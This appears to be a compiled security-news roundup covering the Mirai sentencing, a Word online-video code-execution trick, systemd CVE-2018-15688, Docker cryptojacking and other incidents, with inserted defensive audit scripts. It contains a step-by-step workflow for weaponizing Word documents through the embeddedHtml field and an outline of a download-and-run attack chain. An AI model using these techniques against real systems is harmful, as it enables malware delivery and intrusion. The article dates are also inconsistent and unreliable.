The attacker can also include a <spoofit> argument in the attack command, which works as a netmask, spoofing the bot’s source IP if the spoofit number is set to less than 32.
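Both reports trace the infections to an unauthenticated remote command execution in YARN, which only matters on clusters whose ResourceManager accepts anonymous requests. As an added example (not Radware's or Hadoop's code), the audit below reads the standard Hadoop configuration files and reports the settings that leave YARN in that state. The property names are real Hadoop settings; the two sample configurations are constructed.

```python
"""Audit a Hadoop cluster's configuration for the exposure DemonBot relies on
(added example, not Radware's or Hadoop's code).

The property names below are standard Hadoop settings from core-site.xml and
yarn-site.xml; the sample configurations are constructed.
"""
import xml.etree.ElementTree as ET

# Constructed: a cluster left on the defaults (no authentication, RM bound to all interfaces)
WEAK_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://nn1.internal:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
</configuration>"""
WEAK_YARN_SITE = """<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>0.0.0.0:8088</value></property>
</configuration>"""

# Constructed: Kerberos for RPC and HTTP, ACLs on, ResourceManager bound to one address
HARDENED_CORE_SITE = """<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
</configuration>"""
HARDENED_YARN_SITE = """<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>rm1.internal:8088</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
</configuration>"""


def load_props(xml_text):
    """Flatten Hadoop's <property><name/><value/></property> layout into a dict."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit_yarn_exposure(core_site_xml, yarn_site_xml):
    """Return a list of findings; an empty list means none of the checked weaknesses is present.

    Hadoop applies its defaults when a property is absent, so a missing key is
    treated exactly like the insecure default value.
    """
    core = load_props(core_site_xml)
    yarn = load_props(yarn_site_xml)
    findings = []

    if core.get("hadoop.security.authentication", "simple") != "kerberos":
        findings.append("hadoop.security.authentication=simple: RPC callers are trusted on their own say-so")
    if core.get("hadoop.http.authentication.type", "simple") != "kerberos":
        findings.append("hadoop.http.authentication.type=simple: the ResourceManager REST API takes anonymous requests")

    webapp = yarn.get("yarn.resourcemanager.webapp.address", "0.0.0.0:8088")
    host = webapp.rsplit(":", 1)[0]
    if host in ("", "0.0.0.0"):
        findings.append(f"yarn.resourcemanager.webapp.address={webapp}: REST API bound on every interface")
    if yarn.get("yarn.acl.enable", "false").lower() != "true":
        findings.append("yarn.acl.enable=false: YARN ACLs are not enforced on application submission")
    return findings


if __name__ == "__main__":
    for label, core, yarn in (("weak", WEAK_CORE_SITE, WEAK_YARN_SITE),
                              ("hardened", HARDENED_CORE_SITE, HARDENED_YARN_SITE)):
        result = audit_yarn_exposure(core, yarn)
        print(f"[{label}] {len(result)} finding(s)")
        for finding in result:
            print("  -", finding)
```

With simple HTTP authentication the separate hadoop.http.authentication.simple.anonymous.allowed property (default true) decides whether callers must at least name a user; the audit treats simple mode as exposed because that default is what the campaign depends on.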

Mirai Author Gets House Arrest for DDoS Attacks on University
29.10.2019 securityweek

The author of the Mirai malware has been sentenced to six months of house arrest and ordered to pay $8.6 million in restitution for launching distributed denial-of-service (DDoS) attacks against the systems of Rutgers University.

Paras Jha, 22, of Fanwood, New Jersey, was sentenced on Friday in a New Jersey court after pleading guilty to violating the Computer Fraud and Abuse Act (CFAA). In addition to home confinement and paying restitution, Jha’s sentence includes 2,500 hours of community service and five years of supervised release.

Authorities accused him of launching several DDoS attacks on Rutgers between November 2014 and September 2016.

“Jha’s attacks effectively shut down Rutgers University’s central authentication server, which maintained, among other things, the gateway portal through which staff, faculty, and students delivered assignments and assessments,” the Justice Department said on Friday. “At times, Jha succeeded in taking the portal offline for multiple consecutive periods, causing damage to Rutgers University, its faculty, and its students.”

In September, Jha, along with Josiah White and Dalton Norman, were sentenced in Alaska to five years of probation, 2,500 hours of community service, and ordered to pay $127,000 in restitution for creating and using Mirai and another botnet.

Authorities said at the time that the trio had “cooperated extensively” with the FBI on complex cybercrime investigations. They had also been ordered to cooperate with law enforcement and the research community.

The Mirai botnet ensnared a large number of IoT devices, allowing cybercriminals to launch powerful DDoS attacks and conduct click fraud. According to investigators, Jha, White and Dalton earned roughly $180,000 through their click fraud scheme.

Microsoft Creates Sandbox for Windows Defender
29.10.2019 securityweek

Microsoft announced on Friday that Windows Defender, the antivirus application shipped with the company’s operating systems, can now run in a sandbox, and the tech giant claims it’s the first product of its kind to have this capability.

Microsoft has admitted that both its own employees and external researchers have identified vulnerabilities in Windows Defender, and given that it’s a program that runs with high privileges it can be an attractive target for malicious actors.

By allowing Windows Defender to run in a sandbox, Microsoft aims to increase the application’s resistance to attacks, particularly on the latest version of Windows 10, which includes significant protections and on which privilege escalation from a sandbox should be much more difficult.

Running the antivirus application in a sandbox should ensure that if it becomes compromised, the attacker’s actions are restricted and the rest of the system remains protected.

“Putting Windows Defender Antivirus in a restrictive process execution environment is a direct result of feedback that we received from the security industry and the research community,” Microsoft said in a blog post. “It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing.”

In order to build a sandbox for Windows Defender, Microsoft said it had to overcome several challenges.

The company has created two layers: one for components that can be sandboxed and one for components that require full privileges on the system. In order to avoid a negative impact on performance, interaction between these layers needs to be minimal and needs to take place at key moments.

Microsoft also had to figure out a way to reduce the usage of resources while ensuring that the level of security provided by Windows Defender is not decreased.

The sandboxing feature will be rolled out gradually to insiders running Windows 10 version 1703 or later. Users can also manually enable it by setting a certain environment variable (setx /M MP_FORCE_USE_SANDBOX 1).

The company is encouraging members of the community to test out the new sandboxed Windows Defender and provide feedback. Microsoft says it’s already working on additional anti-tampering mechanisms for Windows Defender.

Logical Bug in Microsoft Word's 'Online Video' Allows Code Execution
29.10.2019 securityweek

Microsoft Office is impacted by a logical bug that allows an attacker to abuse the “online video” feature in Word to execute malicious code, Cymulate security researchers warn.

The issue, which supposedly impacts all users of Office 2016 and older, can be exploited without special configuration, the security researchers say. Furthermore, no security warning is presented to the user when a malicious document abusing the flaw is opened.

According to Cymulate, the vulnerability is created when the user uses the 'online video' feature to embed a video into their document. The bug resides in the associated document.xml file, which contains a parameter called embeddedHtml (under WebVideoPr) that refers to a YouTube iframe code.

The issue, the researchers say, is that an attacker could replace the YouTube iframe code with malicious HTML/JavaScript code that would run in the background. Instead of linking to the actual YouTube video, the payload would open Internet Explorer Download Manager with the embedded code execution file.

The researchers also created a proof-of-concept code that contains the embedded executable as a blob of base64. Once executed, the code uses the msSaveOrOpenBlob method to trigger the download of the executable via Internet Explorer Download Manager, with the option to either run or save the file.

The bug was reported to Microsoft three months ago, Avihai Ben-Yossef, co-founder and CTO of Cymulate, told SecurityWeek via email. However, the Redmond-based software giant did not acknowledge it as a security vulnerability, he also revealed.

“As this specific evasion could also be considered as a vulnerability, we’ve submitted this to Microsoft 3 months ago before we’ve implemented it in our platform. They didn’t acknowledge it as a flaw,” Ben-Yossef says.

Attackers looking to abuse this flaw could hide executable code into Word documents and then abuse social engineering to trick users into opening those documents as part of phishing attacks.

IBM buys Red Hat for $34 Billion, it is largest software transaction in history
29.10.2019 securityaffairs

IBM announced it is going to buy the open source company Red Hat for $34bn with the intent to enhance its cloud offerings.
This is the biggest tech merger in history involving a software company. Red Hat was founded in 1993; it currently operates in 35 countries and employs some 12,000 people. The company achieved a net profit of $259 million in the fiscal year 2018 on a turnover of $2.9 billion (up 21 percent on 2017).

At the same time, IBM has seen its revenue decline by almost a quarter since 2012, when Ginni Rometty took the CEO role.

IBM is going to acquire all common shares of Red Hat for $190.00 per share in cash; on Friday the shares traded at $116.68.

“The acquisition of Red Hat is a game-changer. It changes everything about the cloud market,” explained Ginni Rometty, IBM’s chairman, president and CEO.

“IBM will become the world’s number one hybrid cloud provider, offering companies the only open cloud solution that will unlock the full value of the cloud for their businesses.”

Cloud computing is today a primary business for IBM, which is definitely shifting from its original computer hardware business to analytics, mobile, and cybersecurity.

The Red Hat acquisition will give IBM an immediate boost in cloud revenue growth and will allow the tech giant to expand its offering and upsell to the large number of enterprises that already use Red Hat solutions.

“We will scale what Red Hat has deeply into many more enterprises than they’re able to get to,” Rometty told Bloomberg in a phone interview.


Red Hat will continue to operate in total autonomy and it will be led by its current president and CEO Jim Whitehurst along with the same management team.

“Today is a banner day for open source,” said Paul Cormier, Red Hat’s vice president and president of products and technologies.

“The largest software transaction in history and it’s an open source company. Let that sink in for a minute. We just made history.”

The deal will be completed once Red Hat shareholder approval and regulatory approvals are received; the operation is expected to close in H2 2019.

Systemd flaw could cause the crash or hijack of vulnerable Linux machines
29.10.2019 securityaffairs

Systemd is affected by a security vulnerability that can be exploited to crash a vulnerable Linux machine, and in the worst case to execute malicious code.
An attacker can trigger the vulnerability using maliciously crafted DHCPv6 packets to modify portions of memory on vulnerable systems, potentially achieving remote code execution.

The flaw, tracked as CVE-2018-15688, was reported by Felix Wilhelm of the Google Security team. Wilhelm explained that the overflow can easily be triggered by advertising a DHCPv6 server with a server-id 493 or more characters long.

“The dhcp6_option_append_ia function is used to encode Identity Associations received by the server into the options buffer of an outgoing DHCPv6 packet,” wrote Wilhelm.

“The function receives a pointer to the option buffer buf, its remaining size buflen and the IA to be added to the buffer. While the check at (A) tries to ensure that the buffer has enough space left to store the IA option, it does not take the additional 4 bytes from the DHCP6Option header into account (B). Due to this the memcpy at (C) can go out-of-bound and *buflen can underflow in (D) giving an attacker a very powerful and largely controlled OOB heap write starting at (E). The overflow can be triggered relatively easily by advertising a DHCPv6 server with a server-id >= 493 characters long.”

The flaw resides in the DHCPv6 client of the open-source Systemd management suite that is implemented into several Linux distros (Ubuntu, Red Hat, Debian, Fedora, CoreOS, Mint, and SUSE Linux Enterprise Server).

If IPv6 support is enabled, the DHCPv6 client of the open-source Systemd management suite is automatically activated to process arriving packets.

Experts pointed out that the DHCPv6 client could be woken up by specially crafted router advertisement messages sent by a rogue DHCPv6 server on the local network or at an ISP. In both scenarios, attackers can activate the DHCPv6 client and trigger the vulnerability to crash or hijack Systemd-powered Linux machines.

Both Ubuntu and Red Hat published security advisories on the issue:

“systemd-networkd is vulnerable to an out-of-bounds heap write in the DHCPv6 client when handling options sent by network adjacent DHCP servers. An attacker could exploit this via malicious DHCP server to corrupt heap memory on client machines, resulting in a denial of service or potential code execution.” reads the advisory published by Red Hat.

“Felix Wilhelm discovered that systemd-networkd’s dhcp6 client could be made to write beyond the bounds (buffer overflow) of a heap allocated buffer when responding to a dhcp6 server with an overly-long server-id parameter.” reads the advisory published by Ubuntu.

The author of Systemd, Lennart Poettering, promptly published a security fix for Systemd-based Linux systems relying on systemd-networkd.
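Wilhelm's description of the bug comes down to one arithmetic slip: the room check compared the remaining buffer against the option body alone, while the write also emits a 4-byte option header. The following added example (not systemd's code; a model written for this page) reproduces that check in both its vulnerable and its corrected form against a fixed-capacity buffer, so the out-of-bounds write and the buflen underflow the write-up mentions can be observed without touching the real client. The buffer and length names follow the write-up; the option code is the standard DHCPv6 IA_NA code, and the 64-bit size_t wrap-around is an assumption about the build.

```python
"""Model of the length check behind CVE-2018-15688 (added example; not systemd's code).

Wilhelm's write-up says dhcp6_option_append_ia checked that the remaining room
`buflen` could hold the IA option's body but forgot the 4-byte DHCP6Option header
written in front of it, so the memcpy could run past the buffer and `buflen`
could underflow. This simulates both variants of the check.
"""
import struct

DHCP6OPTION_HEADER_LEN = 4   # 16-bit option code + 16-bit option length
SIZE_T_MASK = (1 << 64) - 1  # size_t wrap-around on a 64-bit build (assumption)
OPTION_IA_NA = 3             # DHCPv6 option code for a non-temporary Identity Association


def append_option(buf, buflen, code, payload, count_header):
    """Append one DHCPv6 option to `buf`, whose free space the caller tracks in `buflen`.

    Returns (bytes_written, new_buflen, overflowed). `overflowed` is True when the
    write ran past the end of `buf`, i.e. the out-of-bounds heap write in the real bug;
    the simulated write is clipped at the buffer end so the model itself stays safe.
    count_header=False reproduces the vulnerable check, count_header=True the fixed one.
    """
    needed = len(payload) + (DHCP6OPTION_HEADER_LEN if count_header else 0)
    if buflen < needed:
        return 0, buflen, False            # the C code returns -ENOBUFS; nothing is written
    option = struct.pack("!HH", code, len(payload)) + payload
    offset = len(buf) - buflen             # next free byte
    end = offset + len(option)
    overflowed = end > len(buf)
    buf[offset:min(end, len(buf))] = option[:len(buf) - offset]
    new_buflen = (buflen - len(option)) & SIZE_T_MASK   # unsigned subtraction wraps
    return len(option), new_buflen, overflowed


def demo(capacity=16, payload_len=14):
    """Run the same slightly-too-large IA body through both checks."""
    payload = b"\x00" * payload_len        # constructed IA body; its contents are irrelevant
    vuln = append_option(bytearray(capacity), capacity, OPTION_IA_NA, payload, count_header=False)
    fixed = append_option(bytearray(capacity), capacity, OPTION_IA_NA, payload, count_header=True)
    return {"vulnerable": vuln, "fixed": fixed}


if __name__ == "__main__":
    for name, (written, remaining, overflowed) in demo().items():
        print(f"{name:10s} wrote {written:2d} bytes, buflen now {remaining}, overflow={overflowed}")
```

With 16 bytes free and a 14-byte body, the vulnerable check passes, 18 bytes are written, and buflen wraps to a huge value, which is exactly the state from which the write-up's "largely controlled OOB heap write" proceeds; the corrected check refuses the option outright.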

Crooks continue to abuse exposed Docker APIs for Cryptojacking
29.10.2019 securityaffairs
Cryptocurrency  Cyber

Cybercriminals continue to abuse unprotected Docker APIs to create new containers used for cryptojacking, Trend Micro warns.

Earlier this year, Sysdig and Aqua Security researchers started observing cyber attacks targeting Kubernetes and Docker instances aimed at mining Monero cryptocurrency.

A container is a package that contains an application and all the dependencies required for its execution. Each Docker container runs on Docker Engine alongside other containers. Experts pointed out that a Docker Engine that is not properly secured could be exposed to remote attack through the Docker Engine API.

Miscreants can abuse Docker Engine API to deploy containers they have created with the specific intent of mining cryptocurrencies.


Experts from Trend Micro have recently observed threat actors scanning for exposed Docker Engine APIs (ports 2375 and 2376) in order to abuse them to deploy containers used for cryptojacking.

“We recently observed cases of abuse of the systems running misconfigured Docker Engine-Community with Docker application program interface (API) ports exposed. We also noticed that the malicious activities were focused on scanning for open ports 2375/TCP and 2376/TCP, which are used by the Docker engine daemon (dockerd).” reads the analysis published by Trend Micro.

“The intrusion attempts to deploy a cryptocurrency-mining malware (detected by Trend Micro as Coinminer.SH.MALXMR.ATNE) on the misconfigured systems.”

The researchers observed that hackers often create Docker containers through exposed API ports and run the following commands on compromised installs:

Install the wget package using the system package manager.
Use wget to download an auto-deployment script.
Convert the script from DOS to Unix format (the script line endings are often in DOS format).
Set the executable permissions on the script.
Run the script (auto.sh).

The auto.sh script deploys a Monero miner and also a port scanner, which scans for other vulnerable Docker Engine installs.

Experts have seen attackers scanning all networks reachable from the host at a rate of 50,000 packets per second for open ports 2375 and 2376, saving the results into a local.txt file.

The attackers conduct lateral movement by infecting or abusing other hosts identified in previous reconnaissance scans.

Experts provided recommendations to secure Docker Engine installs; below are the best practices provided by Trend Micro:

Harden the security posture. The Center for Internet Security (CIS) has a reference that can help system administrators and security teams establish a benchmark to secure their Docker engine.
Ensure that container images are authenticated, signed, and from a trusted registry (i.e., Docker Trusted Registry). Employing automated image scanning tools helps improve development cycles.
Enforce the principle of least privilege. For instance, restrict access to the daemon and encrypt the communication protocols it uses to connect to the network. Docker has guidelines on how to protect the daemon socket.
Properly configure how many resources containers are allowed to use (control groups and namespaces).
Enable Docker’s built-in security features to help defend against threats. Docker has several guidelines on how to securely configure Docker-based applications.
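The third recommendation, restricting access to the daemon and encrypting its network transport, is what separates a dockerd that the scanners can abuse from one they cannot. As an added example (not Trend Micro's or Docker's code), the audit below reads a daemon.json and reports every tcp:// listener that is bound to all interfaces or reachable without client-certificate authentication. The keys it inspects (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are standard dockerd settings; the three sample files are constructed.

```python
"""Audit /etc/docker/daemon.json for the exposure abused in the cryptojacking
campaign above (added example; not Trend Micro's or Docker's code).

Keys checked (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are standard
dockerd settings; the sample files are constructed. 2375/tcp is the conventional
plain-text API port and 2376/tcp the TLS one, as the report notes.
"""
import json

# Constructed: the misconfiguration the scanners are looking for
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed: server certificate on the listener, but no client certificate check
HALF_FIXED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tls": True,
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed: bound to one address, mutual TLS required
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

WILDCARD_BINDS = {"", "0.0.0.0", "::"}


def audit_daemon_json(text):
    """Return findings for each tcp:// listener in daemon.json; [] means no remote exposure found."""
    cfg = json.loads(text)
    findings = []
    tls = bool(cfg.get("tls"))
    tlsverify = bool(cfg.get("tlsverify"))

    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue                      # unix:// and fd:// sockets are local-only
        bind, _, port = host[len("tcp://"):].rpartition(":")
        if bind.strip("[]") in WILDCARD_BINDS:
            findings.append(f"{host}: API listens on every interface")
        if not tlsverify:
            what = ("server TLS only, clients are not authenticated" if tls
                    else "plain text, no authentication at all")
            findings.append(f"{host}: {what}; anyone who can reach port {port} "
                            "can create containers as root")

    if tlsverify:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if not cfg.get(key):
                findings.append(f"tlsverify set but {key} is missing: mutual TLS cannot work without it")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("half-fixed", HALF_FIXED_DAEMON_JSON),
                        ("hardened", HARDENED_DAEMON_JSON)):
        print(f"[{label}]")
        for finding in audit_daemon_json(text) or ["no remote exposure found"]:
            print("  -", finding)
```

The half-fixed case is the one worth remembering: "tls": true encrypts the channel but still lets any client talk to the API, so a scanner that finds 2376 open gets the same container-creation capability as on 2375; only tlsverify makes the daemon demand a certificate signed by the configured CA.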

The Belgacom hack was the work of the UK GCHQ intelligence agency
29.10.2019 securityaffairs
BigBrothers  Incident

A Belgian newspaper reported that investigators had found proof that the Belgacom hack was the work of the UK GCHQ intelligence agency.
Back in September 2013, Belgacom (now Proximus), the largest telecommunications company in Belgium and primarily state-owned, announced that its IT infrastructure had suffered a malware-based attack.

We are speaking about this incident again because the Belgian newspaper De Standaard has provided more details from a Belgian judicial investigation into the alleged involvement of British GCHQ.

Many experts have linked the Regin malware to the Five Eyes alliance: they found alleged references to the spyware in a number of presentations leaked by Edward Snowden, and according to malware researchers it has been used in targeted attacks against government agencies in the EU and the Belgian telecoms company Belgacom.

According to Snowden, the UK’s signals intelligence agency hacked into the Belgian telco to spy on private communications transiting its infrastructure.

This week the Belgian newspaper De Standaard reported that investigators had found proof that the hack “was the work of the GCHQ, an intelligence service of ally Great Britain”.

“This can all be read in a confidential report from the federal prosecutor’s office that the National Security Council discussed at the beginning of this week,” reported De Standaard.

The newspaper also states that federal prosecutors found evidence for the involvement of the UK intelligence in the hack that is not related to Snowden revelations.

“Specifically, these are IP addresses of computers where the spyware software communicated from Belgacom. Three of those addresses were owned by a British company, indicating that the spy software manager is in Great Britain,” continues the newspaper.


The newspaper added that the British Home Office refused to co-operate with the investigation.

If confirmed, the situation is disconcerting: the UK, along with other members of the Five Eyes, was spying on a telco belonging to a member of the NATO alliance.

The investigation revealed that the malware-based attack was powered by GCHQ and code-named Operation Socialist.

During the attack, between 2000 and early 2010, the hackers targeted company admins with spear-phishing attacks aimed at infecting their machines.

The attackers infected at least three Belgian engineers’ machines and used them as entry points into Belgacom’s networks, then infected more than 5,000 machines.

“A GCHQ document reviewing operations conducted between January and March 2011 noted that the hack on Belgacom was successful, and stated that the agency had obtained access to the company’s systems as planned. By installing the malware on the engineers’ computers, the spies had gained control of their machines, and were able to exploit the broad access the engineers had into the networks for surveillance purposes.” wrote The Intercept.

“The document stated that the hacking attack against Belgacom had penetrated “both deep into the network and at the edge of the network,” adding that ongoing work would help “further this new access.”

GCHQ targeted the Belgacom International Carrier Services mainly because it handled a large amount of Middle Eastern roaming traffic.

How to deliver malware using weaponized Microsoft Office docs embedding YouTube video
29.10.2019 securityaffairs

Researchers at the security firm Cymulate devised a new stealthy technique to deliver malware leveraging videos embedded into weaponized Microsoft Office documents.
The technique can be used to execute JavaScript code when a user clicks on a YouTube video thumbnail embedded in a weaponized Office document.

Experts pointed out that no message is displayed by Microsoft Office to request the victim’s consent.

“Cymulate’s research team has discovered a way to abuse the Online Video feature on Microsoft Word to execute malicious code. Attackers could use this for malicious purposes such as phishing, as the document will show the embedded online video with a link to YouTube, while disguising a hidden html/javascript code that will be running in the background and could potentially lead to further code execution scenarios.” reads the analysis published by Cymulate.

“This attack is carried out by embedding a video inside a Word document, editing the XML file named document.xml, replacing the video link with a crafted payload created by the attacker which opens Internet Explorer Download Manager with the embedded code execution file”

The experts created a proof-of-concept attack using a YouTube video link embedded in weaponized Microsoft Office documents.

When a video is embedded in a Word document, an HTML script is created, and it is executed by Internet Explorer when the thumbnail in the document is clicked.

The researchers found a way to modify that HTML script to point to malware instead of the real YouTube video.

An attacker can edit the default XML file named ‘document.xml’; in particular, it is possible to modify the video configuration stored in a parameter called ‘embeddedHtml’, which holds the iframe for the YouTube video and can be replaced with attacker-controlled HTML.

In the attack scenario presented by the researchers, their HTML included a Base64-encoded malware binary that opens the Internet Explorer download manager, which in turn installs the malicious code.

The expected video is displayed without raising suspicion, while the malware is silently installed on the victim’s machine. The experts shared a video PoC of the attack.

Below is the workflow of the attack:

Create a Word document.
Embed an online video: Insert -> Online Video and add any YouTube video.
Save the Word document with the embedded online video.
Unpack the Word document: docx files are actually a package of all the media files that you may see in a docx file. If you unpack the file, either by using an unpacker or by changing the docx extension to zip and unzipping it, you will find several files and directories inside a single docx file.
Edit the document.xml file under the word folder.
Inside the .xml file, look for the embeddedHtml parameter (under WebVideoPr), which contains the YouTube iframe code. Replace the current iframe code with any HTML/JavaScript code to be rendered by Internet Explorer.
Save the changes in the document.xml file, update the docx package with the modified xml and open the document.

The experts demonstrated that just tricking victims into opening the weaponized document and clicking on the embedded video is enough to infect their machines.

Avihai Ben-Yossef, CTO at Cymulate, explained that antimalware detection depends on the specific payload used in the attack and the evasion techniques it implements.

The technique works with Office 2016 and older versions. The researchers notified Microsoft, but the tech giant does not acknowledge the technique as a security flaw.

David Phillips
· Oct 25, 2018
Replying to @CymulateLtd
Appreciate it's good publicity for you, but the usual process is that you give the vendor adequate time to fix the issue before you go public with it.

Hi David, thank you for your note. We did follow the correct process, we notified Microsoft of this issue and provided all the information. Who then responded with an approval to publish. We hope you find this information relevant.

5:48 PM - Oct 25, 2018
Organizations can mitigate the attack by blocking any Word document containing embedded videos.
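The mitigation above (reject any Word document carrying an embedded online video) and the finer check that follows from the workflow (does the embeddedHtml value still look like a plain YouTube iframe, or has it been replaced?) can both be implemented on a mail gateway or file-upload path by inspecting word/document.xml inside the .docx zip package. The following is an added example written for this article; it is not Cymulate's or Microsoft's code. The element and attribute names (webVideoPr, embeddedHtml) are the ones the article names; the regular expression for a benign embed, the module directory layout of the sample package and the sample documents themselves are constructed for this example rather than taken from a real Word export.

```python
import html
import io
import re
import zipfile

# Word's "Online Video" feature stores the player HTML in an embeddedHtml
# attribute on a webVideoPr element inside word/document.xml (names from the write-up).
VIDEO_ELEMENT_RE = re.compile(r"webVideoPr", re.IGNORECASE)
EMBEDDED_HTML_RE = re.compile(r'embeddedHtml="([^"]*)"')

# Assumption for this example: a benign embed is a single iframe whose src points at
# the youtube.com/embed player, and nothing else.
BENIGN_IFRAME_RE = re.compile(
    r'^\s*<iframe\b[^>]*\ssrc="https://www\.youtube\.com/embed/[A-Za-z0-9_-]+[^"]*"[^>]*>\s*</iframe>\s*$',
    re.IGNORECASE | re.DOTALL,
)


def is_plain_youtube_iframe(markup: str) -> bool:
    """True only for a lone YouTube iframe with no script, object or javascript: URL inside."""
    lowered = markup.lower()
    if "<script" in lowered or "javascript:" in lowered or "<object" in lowered:
        return False
    return BENIGN_IFRAME_RE.match(markup) is not None


def scan_docx(data: bytes) -> dict:
    """Inspect word/document.xml of a .docx (a zip package) for online-video embeds."""
    result = {"has_online_video": False, "embedded_html": [], "suspicious": False}
    with zipfile.ZipFile(io.BytesIO(data)) as package:
        if "word/document.xml" not in package.namelist():
            return result  # not a Word package; nothing to inspect
        xml = package.read("word/document.xml").decode("utf-8", errors="replace")
    if VIDEO_ELEMENT_RE.search(xml):
        result["has_online_video"] = True
    for match in EMBEDDED_HTML_RE.finditer(xml):
        markup = html.unescape(match.group(1))  # attribute values are entity-escaped in XML
        result["embedded_html"].append(markup)
        if not is_plain_youtube_iframe(markup):
            result["suspicious"] = True
    return result


def should_block(data: bytes) -> bool:
    """The blanket mitigation from the write-up: reject any document that embeds an online video."""
    return scan_docx(data)["has_online_video"]


def build_sample_docx(embedded_html=None) -> bytes:
    """Constructed minimal .docx for testing: a zip with word/document.xml and, optionally,
    one webVideoPr element. Hand-built stand-in, not a file exported by Word."""
    drawing = ""
    if embedded_html is not None:
        escaped = html.escape(embedded_html, quote=True)
        drawing = f'<w:drawing><wp15:webVideoPr embeddedHtml="{escaped}" h="360" w="640"/></w:drawing>'
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing">'
        f'<w:body><w:p><w:r><w:t>sample</w:t>{drawing}</w:r></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed samples: a document with no video, one with an untouched YouTube embed,
# and one where the iframe was swapped for a script tag (a stand-in for attacker HTML).
NO_VIDEO_DOCX = build_sample_docx()
BENIGN_DOCX = build_sample_docx(
    '<iframe width="640" height="360" src="https://www.youtube.com/embed/SAMPLE_ID_01?feature=oembed" '
    'frameborder="0"></iframe>'
)
TAMPERED_DOCX = build_sample_docx('<script>alert("iframe replaced")</script>')

if __name__ == "__main__":
    for name, doc in (("no video", NO_VIDEO_DOCX), ("benign", BENIGN_DOCX), ("tampered", TAMPERED_DOCX)):
        print(name, "->", scan_docx(doc), "block:", should_block(doc))
```

The two functions give two policies: should_block implements the blanket rule quoted above, while scan_docx lets a gateway allow untouched YouTube embeds and quarantine only documents whose embeddedHtml no longer matches a plain iframe. Whichever you choose, keep the check on the unpacked XML rather than on file extension alone, since the package is just a zip.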

Analysis of North Korea's Internet Traffic Shows a Nation Run Like a Criminal Syndicate
28.10.2019 securityweek
BigBrothers  Cyber

Recorded Future has published a series of analyses on North Korea's most senior leadership's use of the internet. As the last report of the series, it demonstrates how adaptable this leadership has become in both using and monetizing its use of the internet.

The leadership's pattern of global internet usage has shifted. A year ago, it peaked at the weekends, primarily for online gaming and video streaming. Over the last year, weekday usage has increased while weekend use has decreased (although weekend use is still primarily for gaming and streaming). Recorded Future does not know why this shift has occurred, but suggests that it is indicative of the global internet becoming a greater part of the leaders' everyday work.

Concurrent with this pattern change has been the construction of North Korea's new Internet Communications Bureau headquarters in Pyongyang. The combination of changing usage patterns and the completion of this building could, suggests Recorded Future, "signify a professionalization of internet use across North Korea's most senior leadership. This would mean that these leaders utilize the internet to a greater extent as part of their jobs, as opposed to for their own entertainment."

Noticeably, an earlier spike in the use of secure browsing (use of Tor, VPNs, etcetera) has diminished. The report suggests the spike may have been caused by an internal policy requirement, "which then slowly waned over time as the costs in time, money, and accessibility began to outweigh the benefits."

A move away from the use of Western social media in favor of Chinese equivalents such as Baidu, Alibaba, and Tencent was first detected in late 2017. This has persisted -- except for LinkedIn, where usage has increased.

Cryptocurrencies are known to be used by North Korea as a form of foreign exchange. North Korean cybercriminals are thought to be behind numerous raids on cryptocurrency exchanges in recent years. Recorded Future now believes the country has also been involved in at least two cryptocurrency scams.

The first involved the altcoin HOLD. In early 2018 it went through the process of 'staking', where users mine an initial number of coins but are not allowed to trade them. The purpose is to build interest, value and a user base -- but it's a risky process since the developers control the staking timeframe and can limit the trades.

"Over the course of 2018," reports Recorded Future, "HOLD coin was listed and delisted on a series of exchanges, underwent a rebranding, changed its name to HUZU, and as of this publication, has left its investors high and dry. We assess with low confidence that North Korean users were involved in the Interstellar/Stellar/HOLD/HUZU altcoin."

The second scam that it assesses with high confidence was conducted on behalf of North Korea was a blockchain application called Marine Chain Platform. Recorded Future notes that in April and May 2018, the Marine Chain website was hosted on the same IP address that hosted Binary Tilt. Binary Tilt has been declared fraudulent by the government of Ontario, Canada. Dozens of users have posted testimonials of losses of tens to hundreds of thousands of dollars and scams on this site.

Recorded Future has traced Marine Chain connections to North Korea. In particular, Marine Chain's CEO, Captain Foong, has been connected to Singaporean companies that have assisted North Korean sanctions circumvention efforts since at least 2013. "Capt. Foong," claims the report, "is part of a network of enablers throughout the world that assist North Korea in circumventing international sanctions. These connections to Marine Chain Platform mark the first time this vast and illicit network has utilized cryptocurrencies or blockchain technology to raise funds for the Kim regime."

